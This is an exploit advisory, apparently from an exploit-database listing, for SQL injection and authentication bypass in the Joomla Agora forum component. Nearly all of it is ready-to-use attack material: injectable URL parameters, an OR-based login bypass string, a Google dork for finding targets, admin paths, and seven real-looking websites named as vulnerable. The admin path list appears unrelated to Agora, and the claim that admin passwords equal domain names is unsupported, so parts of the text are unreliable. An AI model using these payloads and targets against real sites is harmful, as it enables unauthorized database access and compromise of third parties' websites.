Joomla Agora 4.10 SQL Injection / Authentication Bypass

1. ####################################################################
2.  
3. # Exploit Title : Joomla Agora 4.10 SQL Injection / Authentication Bypass
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 12/02/2019
7. # Vendor Homepage : joomla4ever.org
8. # Software Download Link : joomla4ever.org/archive/ext/com_agora.zip
9. # Software Information Link : joomla4ever.org/extensions/ext-agora
10. joomlashack.com/blog/joomla/agora/
11. # Software Version : 3.0 and 4.10 - other previous versions.
12. Compatible with Joomla 1.5 - 2.5 and 3.x
13. # Tested On : Windows and Linux
14. # Category : WebApps
15. # Exploit Risk : Medium
16. # Google Dorks : inurl:''/index.php?option=com_agora''
17. # Vulnerability Type : CWE-89 [ Improper Neutralization of
18. Special Elements used in an SQL Command ('SQL Injection') ]
19. CWE-287 [ Improper Authentication ]
20. CWE-592 [ Authentication Bypass Issues ]
21. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
22. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
23. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
24.  
25. ####################################################################
26.  
27. # Description about Software :
28. ***************************
29.  
30. Agora is forum extension for Joomla compatible with 1.5 - 2.5 and 3.x version.
31.  
32. ####################################################################
33.  
34. # Impact :
35. ***********
36. Joomla Agora 4.10 and other versions -
37.  
38. component for Joomla is prone to an SQL-injection vulnerability because it
39.  
40. fails to sufficiently sanitize user-supplied data before using it in an SQL query.
41.  
42. Exploiting this issue could allow an attacker to compromise the application,
43.  
44. access or modify data, or exploit latent vulnerabilities in the underlying database.
45.  
46. A remote attacker can send a specially crafted request to the vulnerable application
47.  
48. and execute arbitrary SQL commands in application`s database.
49.  
50. Further exploitation of this vulnerability may result in unauthorized data manipulation.
51.  
52. An attacker can exploit this issue using a browser.
53.  
54. ####################################################################
55.  
56. # SQL Injection Exploit :
57. **********************
58. /index.php?option=com_agora&task=[SQL Injection]
59.  
60. /index.php?option=com_agora&task=profile&user_id=[SQL Injection]
61.  
62. /index.php?option=com_agora&id=[ID-NUMBER]&Itemid=[SQL Injection]
63.  
64. /index.php?option=com_agora&task=topic&id=[ID-NUMBER]&p=[SQL Injection]
65.  
66. /index.php?option=com_agora&task=profile&page=[SQL Injection]
67.  
68. /index.php?option=com_agora&task=profile&page=preview&action=[SQL Injection]
69.  
70. /index.php/templates/index.php?option=com_agora&id=[ID-NUMBER]&Itemid=[SQL Injection]
71.  
72. /index.php?option=com_agora&task=profile&page=preview&action=add_warning&type=[SQL Injection]
73.  
74. /index.php?option=com_agora&task=profile&page=preview&action=add_warning&type=clean&user_id=[SQL Injection]&lang=en
75.  
76. /component/agora/?task=viewforum&id=[SQL Injection]
77.  
78. ####################################################################
79.  
80. # Authentication Bypass/Incorrect Authorization Exploit :
81. *************************************
82. /index.php?option=com_agora&task=profile&page=preview&action=add_warning&type=clean&user_id=1&lang=en
83.  
84. Proof of Concept => cdn.pbrd.co/images/I0GjhUq.png
85.  
86. # Admin Panel Login Path :
87.  
88. /administrator
89. [PATH]/admin
90.  
91. Note : Admin Password is the domain address name.
92.  
93. '=''OR'
94. '=''OR'
95.  
96. /admin/index.php?option=com_agora&task=upload
97. /admin/mystore.php
98. /admin/editproducts.php
99. /admin/editcat.php
100. /admin/orders.php
101. /admin/members.php
102. /admin/editmanu.php
103. /admin/editpayment.php
104. /admin/addtaxrules.php
105. /admin/editshipping.php
106. /admin/newsletter.php
107. /admin/editpromos.php
108. /admin/import_export.php
109. /admin/editlangfile.php
110. /admin/custom_config.php
111.  
112. ####################################################################
113.  
114. # Example Vulnerable Sites :
115. *************************
116. [+] spdst.ehost.pl/index.php?option=com_agora&task=profile&page=
117. preview&action=add_warning&type=clean&user_id=1&lang=en
118.  
119. [+] gioblu.com/index.php?option=com_agora&id=1&Itemid=39
120.  
121. [+] vk-duisburg.de/index.php?option=com_agora&task=topic&id=870&p=936
122.  
123. [+] atlanticgreenbuilding.ca/index.php?option=com_agora&task=profile&user_id=7281
124.  
125. [+] afcommerce.com/demostore/admin/index.php?option=com_agora&task=upload
126.  
127. [+] milosnicy-historii.org/index.php/templates/index.php?option=com_agora&id=1&Itemid=17
128.  
129. [+] goltz-optique.ch/component/agora/?task=viewforum&id=1
130.  
131. ####################################################################
132.  
133. # Example SQL Database Error :
134. ****************************
135. Warning: Invalid argument supplied for foreach() in
136. /web/htdocs/www.gioblu.com/home/components
137. /com_agora/controller/index.php on line 145
138.  
139. ####################################################################
140.  
141. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
142.  
143. ####################################################################